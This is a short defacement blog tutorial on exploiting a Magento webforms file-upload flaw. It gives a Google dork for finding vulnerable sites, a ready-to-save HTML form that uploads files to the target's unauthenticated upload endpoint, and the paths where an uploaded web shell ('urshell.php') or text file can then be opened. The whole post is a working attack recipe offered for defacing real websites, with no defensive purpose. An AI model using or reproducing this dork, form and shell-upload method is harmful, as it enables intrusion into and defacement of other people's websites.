Header Ads

Home > Deface > Tutorial > Deface With "Magento File Upload Vulnerabilty

Deface With "Magento File Upload Vulnerabilty

October 03, 2017 ,



#######################################################
Google dork : inurl:js/webforms/
Prof : /js/webforms/upload/index.php
Site Vuln : []

CSRF (NotePad Save x.Html)
<form method="POST" action="https://site.Target.com/js/webforms/upload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>

Cek hasil Shell/txt

https://site.target.com/js/webforms/upload/files/[random]/urshell.php

Or https://site.target.com/js/webforms/upload/files/[random]/x.txt

Shared : dark-cannon 

##########################################################################################

Post a Comment

No comments

Subscribe to: Post Comments ( Atom )
Powered by Blogger.